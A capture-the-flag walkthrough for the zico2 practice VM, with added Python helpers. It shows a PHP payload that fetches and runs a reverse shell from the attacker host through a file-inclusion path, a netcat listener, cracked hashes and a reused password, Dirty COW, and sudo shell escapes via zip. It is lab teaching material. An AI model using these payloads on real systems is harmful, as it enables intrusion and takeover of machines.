Overview
zico2 is a boot2root virtual machine designed for students to practice vulnerability analysis and exploitation. The objective is to get root on the machine by chaining the vulnerabilities it exposes into a full system compromise.
Lab Setup:
- VMware Workstation for the virtual machines
- Kali Linux VM in bridged mode
- zico2 in bridged mode
Tools Used:
- Kali Linux VM
- netdiscover
- nmap
- gcc
- pentestmonkey php-reverse-shell
Vulnerabilities Exploited:
- Default phpLiteAdmin password
- Local file inclusion chained with phpLiteAdmin remote PHP code injection
- Password reuse (the database password in wp-config.php is also the zico user's SSH password)
- Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method)
- sudo misconfiguration (zip runnable as root without a password)
Reconnaissance
netdiscover
Target VM IP Address: 192.168.8.104
Scanning
nmap
nmap -p- -A 192.168.8.104
Nmap findings:
- The target is a Linux machine
- SSH on port 22
- A web server on port 80
Exploit path 1 for a shell: LFI + phpLiteAdmin RCE
Let's explore the website in the browser.
Found an LFI: the page parameter of view.php includes whatever path it is given (we use it below to include a file from outside the web root).
Other than the LFI, nothing fancy. Let's enumerate the website with dirbuster.
Dirbuster found a dbadmin directory.
http://192.168.8.104/dbadmin/ is "phpLiteAdmin v1.9.3".
Googling "phpLiteAdmin v1.9.3" vulnerabilities turns up the default password "admin" along with a remote PHP code injection.
Logged into phpLiteAdmin with the password "admin".
The code injection in phpLiteAdmin v1.9.3 is what we will exploit for a shell.
Before that, let's check whether the test users' password hashes stored in the database can be cracked and reused over SSH.
The 32-hex-character hashes are unsalted MD5; cracked with an online lookup:
root:653F4B285089453FE00E2AAFAC573414:34kroot34
zico:96781A607F4E9F5F423AC01F0DAB0EBD:zico2215@
These username:password pairs are not reusable over SSH.
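As an added example (not code from the original walkthrough), the same check done offline: identify the hash type from its shape and run a dictionary attack against unsalted MD5. The page's two hashes are used as input; the wordlist is a constructed stand-in for a real one such as rockyou.txt, and the hash-type guesser only knows the few formats named in its comments.

```python
import hashlib
import re

# The two user:hash pairs the walkthrough pulled out of phpLiteAdmin.
TARGET_HASHES = {
    "root": "653F4B285089453FE00E2AAFAC573414",
    "zico": "96781A607F4E9F5F423AC01F0DAB0EBD",
}

# Constructed wordlist for the demo; a real run would point at rockyou.txt or similar.
WORDLIST = ["password", "admin", "zico", "34kroot34", "zico2215@", "letmein"]


def md5_hex(word: str) -> str:
    """Unsalted MD5 of a UTF-8 word as lowercase hex (the shape of the hashes above)."""
    return hashlib.md5(word.encode("utf-8")).hexdigest()


def identify(hash_value: str) -> str:
    """Rough hash-type guess from length and charset, enough to pick a hashcat mode."""
    h = hash_value.strip()
    if re.fullmatch(r"[0-9a-fA-F]{32}", h):
        return "md5 (unsalted, hashcat -m 0)"
    if re.fullmatch(r"[0-9a-fA-F]{40}", h):
        return "sha1 (hashcat -m 100)"
    if h.startswith("$P$") or h.startswith("$H$"):
        return "phpass (WordPress/phpBB, hashcat -m 400)"
    if h.startswith("$6$"):
        return "sha512crypt (hashcat -m 1800)"
    return "unknown"


def crack_md5(hash_value: str, wordlist):
    """Dictionary attack on one unsalted MD5 hash; returns the plaintext or None.
    Comparison is case-insensitive because phpLiteAdmin showed the hashes in uppercase."""
    target = hash_value.strip().lower()
    for word in wordlist:
        if md5_hex(word) == target:
            return word
    return None


def crack_all(hashes: dict, wordlist) -> dict:
    """Crack every hash in a {user: hash} map; uncracked users map to None."""
    return {user: crack_md5(h, wordlist) for user, h in hashes.items()}


if __name__ == "__main__":
    results = crack_all(TARGET_HASHES, WORDLIST)
    for user, h in TARGET_HASHES.items():
        print(f"{user}: {h} -> {identify(h)} -> {results[user]}")
```

Running the block against the page's hashes shows whether the online lookup agrees with a local dictionary attack; a cracked password is then worth trying against SSH and every other service found, which is exactly the reuse check the walkthrough performs.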
Next target: the phpLiteAdmin v1.9.3 remote PHP code injection.
Before exploiting the code injection on the server, host the pentestmonkey reverse shell on the attacking machine (192.168.8.105). It is served as shell.txt so the attacker's own web server hands out the source instead of executing it:
http://192.168.8.105/shell.txt
Also start a netcat listener for the reverse connection, on the port configured in the reverse shell script:
nc -nvlp 1234
Configuration on the attacking machine is complete.
Now, on the target, in phpLiteAdmin I created a database named sahi and renamed it to sahi.php. phpLiteAdmin stores its database files in /usr/databases/ on this box, so the file on disk becomes /usr/databases/sahi.php.
Then I created a table with a text column and set its default value to our PHP code. SQLite stores the CREATE TABLE text verbatim inside the database file, so the payload lands on disk unchanged:
<?php system("wget 192.168.8.105/shell.txt -O /usr/databases/shell4.php; php /usr/databases/shell4.php"); ?>
Including the database file through the LFI makes PHP execute the tag pair inside it (the binary SQLite bytes around it are just echoed):
http://192.168.8.104/view.php?page=../../../../../../../../usr/databases/sahi.php
We received the reverse shell connection.
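To show why this chain works, here is an added example (not code from the walkthrough or from phpLiteAdmin) that builds an SQLite file the way phpLiteAdmin does when a column DEFAULT is set, proves the PHP tag pair survives intact inside the binary file, and then mimics the path handling of view.php?page= in both its vulnerable and a hardened form. The web root /var/www/html, the payload, and the assumption that view.php simply joins the parameter to the web root are all mine; the page does not show view.php's source.

```python
import os
import posixpath
import sqlite3
import tempfile

# Stand-in for the page's wget+php one-liner; any <?php ... ?> behaves the same way (assumption).
PAYLOAD = '<?php system("id"); ?>'

# Assumed web root of view.php; not stated on the page.
WEBROOT = "/var/www/html"


def build_poisoned_db(payload: str) -> bytes:
    """Create an SQLite file the way phpLiteAdmin does when you set a column DEFAULT:
    the payload becomes part of the CREATE TABLE text, which SQLite keeps verbatim in
    sqlite_master. Returns the raw bytes of the finished database file."""
    with tempfile.TemporaryDirectory() as workdir:
        path = os.path.join(workdir, "sahi.php")
        conn = sqlite3.connect(path)
        try:
            escaped = payload.replace("'", "''")  # SQL string-literal escaping
            conn.execute(f"CREATE TABLE t (c TEXT DEFAULT '{escaped}')")
            conn.commit()
        finally:
            conn.close()
        with open(path, "rb") as f:
            return f.read()


def extract_php(blob: bytes):
    """What PHP's include() would execute: the first <?php ... ?> pair, wherever it sits.
    Everything outside the tags (the SQLite header and pages) is just echoed as output."""
    start = blob.find(b"<?php")
    if start == -1:
        return None
    end = blob.find(b"?>", start)
    if end == -1:
        return None
    return blob[start:end + 2].decode("utf-8", errors="replace")


def vulnerable_resolve(page: str) -> str:
    """Assumed behaviour of view.php?page=: join the parameter to the web root with no
    validation, so ../ sequences walk out to any file the web server can read."""
    return posixpath.normpath(posixpath.join(WEBROOT, page))


def hardened_resolve(page: str):
    """Same join, but refuse anything that does not stay under the web root after
    normalisation. An allow-list of page names is stricter still and usually preferable."""
    resolved = posixpath.normpath(posixpath.join(WEBROOT, page))
    if not resolved.startswith(WEBROOT.rstrip("/") + "/"):
        return None
    return resolved


if __name__ == "__main__":
    blob = build_poisoned_db(PAYLOAD)
    print("file header:", blob[:16])
    print("PHP would run:", extract_php(blob))
    traversal = "../../../../../../../../usr/databases/sahi.php"
    print("vulnerable:", vulnerable_resolve(traversal))
    print("hardened:", hardened_resolve(traversal))
```

The two halves together are the bug: a writable directory whose file names the attacker controls (phpLiteAdmin lets you pick a .php name) plus an include that accepts traversal. Fixing either one breaks the chain, which is why the hardened resolver rejects the path even though the poisoned file still exists.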
Let's upgrade the limited shell to a proper TTY:
python -c "import pty; pty.spawn('/bin/bash');"
Exploring /home/zico/wordpress/wp-config.php reveals the database connection settings:
username: zico
password: sWfCsfJSPV9H3AmQzw8
The same password was reused for the zico system account, so let's log in over SSH with this username and password.
Privilege Escalation 1: Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method)
Let's compile and root the box with this exploit: https://www.exploit-db.com/exploits/40839/ . The build line is in the exploit's header comment; when run, it uses the race to overwrite a line of /etc/passwd with a new root-equivalent user whose password you choose, after which su to that user gives a root shell. The exploit prints how to restore the original /etc/passwd, which is worth doing, since a corrupted passwd file can lock everyone out.
Congrats! We are root.
Privilege Escalation 2: sudo misconfiguration.
The zip utility can be run with sudo. zip is able to execute system commands: its -TT option runs an arbitrary command to "test" the archive, so when zip is invoked with sudo that command runs as root. So let's invoke a shell!
Congrats, we are root a second time!
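As an added example (not code from the original walkthrough), here is a small enumeration helper for this class of misconfiguration: it parses the output of sudo -l and maps each sudo-able binary to the publicly documented GTFOBins escape that turns it into a root shell. The sudo -l listing below is constructed for the demo; the page does not reproduce the real one. Only zip is used on the page; find and vim are included as further well-known entries from the same catalogue.

```python
import re

# Constructed `sudo -l` output for the demo; the real listing on the box is not shown on the page.
SUDO_L_OUTPUT = """\
Matching Defaults entries for zico on this host:
    env_reset, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User zico may run the following commands on this host:
    (root) NOPASSWD: /usr/bin/zip
"""

# Shell escapes for binaries that hand out a shell when run under sudo (public GTFOBins entries).
# zip: -T tests the archive and -TT replaces the test command; 'sh #' comments out the appended
# archive name, so you get an interactive root shell.
SHELL_ESCAPES = {
    "zip": "sudo zip /tmp/x.zip /etc/hosts -T -TT 'sh #'",
    "find": "sudo find . -exec /bin/sh \\; -quit",
    "vim": "sudo vim -c ':!/bin/sh'",
}

# A rule line looks like "(root) NOPASSWD: /usr/bin/zip" or "(ALL : ALL) ALL".
RULE_RE = re.compile(r"^\s*\(([^)]+)\)\s*(NOPASSWD:\s*)?(.+)$")


def parse_sudo_l(output: str):
    """Return [(runas, nopasswd, [commands])] for each rule line after the 'may run' header."""
    rules = []
    in_rules = False
    for line in output.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_rules = True
            continue
        if not in_rules:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        runas, nopasswd, cmds = m.group(1), bool(m.group(2)), m.group(3)
        rules.append((runas, nopasswd, [c.strip() for c in cmds.split(",")]))
    return rules


def find_escapes(output: str):
    """For every sudo-able command with a known shell escape, return
    (command, runas, nopasswd, escape) so the operator knows exactly what to type."""
    hits = []
    for runas, nopasswd, cmds in parse_sudo_l(output):
        for cmd in cmds:
            if cmd == "ALL":
                hits.append((cmd, runas, nopasswd, "sudo /bin/sh"))
                continue
            binary = cmd.split()[0].rsplit("/", 1)[-1]
            if binary in SHELL_ESCAPES:
                hits.append((cmd, runas, nopasswd, SHELL_ESCAPES[binary]))
    return hits


if __name__ == "__main__":
    for cmd, runas, nopasswd, escape in find_escapes(SUDO_L_OUTPUT):
        tag = "NOPASSWD" if nopasswd else "password required"
        print(f"{cmd} as {runas} ({tag}) -> {escape}")
```

The fix on the defending side is the mirror image of the check: never grant sudo on a binary that can spawn a subprocess (archivers, editors, find, pagers) unless the rule pins exact arguments, and audit sudoers against the same catalogue the attacker uses.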